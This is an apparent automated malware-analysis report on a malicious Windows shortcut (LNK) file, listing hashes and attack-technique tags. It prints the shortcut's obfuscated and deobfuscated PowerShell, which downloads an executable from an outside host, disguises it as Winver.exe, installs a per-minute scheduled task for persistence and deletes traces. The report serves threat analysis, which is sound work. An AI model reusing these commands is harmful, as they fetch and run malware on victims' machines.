Malicious

8930abf86e2e94b1a4b373e25d01f2ff

LNK File | MD5: 8930abf86e2e94b1a4b373e25d01f2ff | Size: 2.55 KB | application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:conhost.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated

Characteristics
Hash
Hash Value
MD5
8930abf86e2e94b1a4b373e25d01f2ff
Sha1
3a83ba1264291493a8fa39b4d343c0e1ee271974
Sha256
4466995be863ec4405fc053296cfe74d0098f94e61aa89c95fa2cc80c8ad6cb9
Sha384
f94877f5797b14efc11614c949a28e39ea8b22f34cd21e8101d3999ba2b29664757075ba6dfb35861749470b2dccfb58
Sha512
ebe5c0d7152ce8ed35e6a71c6436c0a1fbb929def0c417334136f69f86b1dfce002e906f7fce5e92e6ad9bc85fbde5a919c29600def19ec35f7980876ccb2faa
SSDeep
48:8jBhv72LXXOrcOqhaMmOqhukesqAqL5dqoB6rHXv3QiYcs6N0:8jBdSLXOgdaMmdGcEQv9YbM
TLSH
4151CE182AE11624F3F24B7954BB55C08D3ABD5EFE318E9C4291D54C0861A1AFC72F2F
File Structure
8930abf86e2e94b1a4b373e25d01f2ff
Tags: LNK, Malicious, LOLBin, LOLBin:conhost.exe, Execution: CMD in LNK, T1059.003, T1202: Indirect Command Execution, T1204.002, Execution: PowerShell in LNK, T1059.001, PowerShell, Batch Command, PowerShell Call, DeObfuscated
Verdict: Malicious
- LNK CommandLine (PowerShell, Batch Command, PowerShell Call, DeObfuscated): Malicious
- [PowerShell Command] (PowerShell, DeObfuscated): Malicious
- [Deobfuscated PS] (DeObfuscated, PowerShell): Malicious
- [Lnk Summary]: Malicious
Artefacts
Name
Value
LNK: Command Execution

conhost.exe powershell $ProgressPreference = 'SilentlyContinue';$b='C:\Users';iw''r https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271 -OutFile $b\Public\89565254.pdf;s''a''p''s $b\Public\89565254.pdf;iw''r https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f -OutFile "$b\Public\hip";r''e''n -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe";c''p''i "$b\Public\89565254.pdf" -destination .;sch''ta''s''ks /c''r''e''a''te /S''c minute /''t''n'' GoogleErrorReport /t''r "$b\Public\Winver" /f;e''r''a''s''e *d?.?n?

Deobfuscated PowerShell

$ProgressPreference = "SilentlyContinue"
$b = "C:\Users"
Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/18803/view/66e1c460-e71e-4dac-a35a-f2529b20e271" -OutFile $b\Public\89565254.pdf
saps $b\Public\89565254.pdf
Invoke-WebRequest "https://jlu-edu.org/download/fetch/list1/10884/view/fe35dfdc-e78f-4479-a142-3df61d6cbe6f" -OutFile "$b\Public\hip"
ren -Path "$b\Public\hip" -NewName "$b\Public\Winver.exe"
cpi "$b\Public\89565254.pdf" -destination "."
schtasks "/create" "/Sc" "minute" "/tn" "GoogleErrorReport" "/tr" "$b\Public\Winver" "/f"
Remove-Item "*d?.?n?"
